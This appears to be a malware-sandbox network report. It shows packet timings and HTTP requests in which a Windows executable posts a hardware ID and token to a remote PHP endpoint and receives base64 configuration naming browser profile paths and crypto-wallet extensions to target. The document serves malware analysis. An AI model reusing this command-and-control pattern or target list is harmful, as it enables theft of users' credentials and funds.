Apr 23, 2024 09:27:32.938299894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.938318014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938352108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938385963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938390017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.938431025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.938507080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938538074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938568115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938586950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.938599110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938620090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.938647032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.938678980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938709974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938740015 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.938771963 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.938785076 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938816071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938847065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938855886 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:32.938878059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938910961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938941002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.938971996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939043999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939204931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939548969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939579964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939610958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939640045 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939671040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939701080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939730883 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939760923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939793110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939824104 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939853907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939883947 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939913988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939944029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.939975023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940046072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940077066 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940129042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940160036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940234900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940264940 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940337896 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940368891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940439939 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940511942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940583944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940655947 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940687895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940717936 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940747976 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940857887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:32.940888882 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.145853043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.145978928 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.146327019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.146359921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.146491051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.146646023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.146676064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.146707058 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.146797895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.146828890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.146961927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.147677898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.147710085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.147741079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.147835970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.147866964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.147996902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.148030043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.148169041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.148200989 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.148339987 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.148503065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.148534060 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.148670912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.571419954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.571546078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:33.606122017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:33.811846018 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.970809937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:33.970892906 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:51.113148928 CEST	49730	80	192.168.2.4	185.172.128.111

HTTP Request Dependency Graph

185.172.128.111

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.172.128.111	80	6672	C:\Users\user\Desktop\q27UFusYdn.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 09:26:54.922166109 CEST	418	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFCAFIIDHIDGHIECGDGI Host: 185.172.128.111 Content-Length: 216 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 43 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 36 46 33 41 30 45 38 32 43 41 37 34 31 36 38 38 36 39 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 43 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 43 47 44 47 49 2d 2d 0d 0a Data Ascii: ------KFCAFIIDHIDGHIECGDGIContent-Disposition: form-data; name="hwid"56F3A0E82CA74168869055------KFCAFIIDHIDGHIECGDGIContent-Disposition: form-data; name="build"default10------KFCAFIIDHIDGHIECGDGI--
Apr 23, 2024 09:26:55.588224888 CEST	343	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:26:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 148 Connection: keep-alive Vary: Accept-Encoding Data Raw: 4f 54 55 34 59 7a 5a 6c 4d 57 4e 68 4e 57 52 6c 4f 44 6b 35 4d 44 63 78 5a 6a 45 34 59 54 5a 68 59 7a 52 6b 59 7a 4d 7a 59 7a 6b 79 4e 7a 59 79 5a 6d 49 79 4e 7a 59 31 5a 44 67 32 4d 6d 52 6b 59 54 51 30 4d 47 46 68 4e 6a 4d 32 4f 44 55 32 4d 7a 46 69 4d 44 63 79 4d 32 51 35 4d 6d 55 77 66 44 55 78 4f 44 51 78 4f 54 46 38 4d 54 45 34 4d 54 67 78 4e 54 55 75 5a 6d 6c 73 5a 58 77 78 66 44 42 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 Data Ascii: OTU4YzZlMWNhNWRlODk5MDcxZjE4YTZhYzRkYzMzYzkyNzYyZmIyNzY1ZDg2MmRkYTQ0MGFhNjM2ODU2MzFiMDcyM2Q5MmUwfDUxODQxOTF8MTE4MTgxNTUuZmlsZXwxfDB8MXwxfDF8MXwxfDF8
Apr 23, 2024 09:26:55.589663982 CEST	470	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIIIJDHJEGIECBGHIJE Host: 185.172.128.111 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 38 63 36 65 31 63 61 35 64 65 38 39 39 30 37 31 66 31 38 61 36 61 63 34 64 63 33 33 63 39 32 37 36 32 66 62 32 37 36 35 64 38 36 32 64 64 61 34 34 30 61 61 36 33 36 38 35 36 33 31 62 30 37 32 33 64 39 32 65 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 2d 2d 0d 0a Data Ascii: ------GIIIIJDHJEGIECBGHIJEContent-Disposition: form-data; name="token"958c6e1ca5de899071f18a6ac4dc33c92762fb2765d862dda440aa63685631b0723d92e0------GIIIIJDHJEGIECBGHIJEContent-Disposition: form-data; name="message"browsers------GIIIIJDHJEGIECBGHIJE--
Apr 23, 2024 09:26:55.902558088 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:26:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb
Apr 23, 2024 09:26:55.902579069 CEST	427	IN	Data Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39 Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
Apr 23, 2024 09:26:55.903820992 CEST	469	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKK Host: 185.172.128.111 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 38 63 36 65 31 63 61 35 64 65 38 39 39 30 37 31 66 31 38 61 36 61 63 34 64 63 33 33 63 39 32 37 36 32 66 62 32 37 36 35 64 38 36 32 64 64 61 34 34 30 61 61 36 33 36 38 35 36 33 31 62 30 37 32 33 64 39 32 65 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 2d 2d 0d 0a Data Ascii: ------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="token"958c6e1ca5de899071f18a6ac4dc33c92762fb2765d862dda440aa63685631b0723d92e0------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="message"plugins------EHIDAKECFIEBGDHJEBKK--
Apr 23, 2024 09:26:56.219444036 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:26:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62 Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2J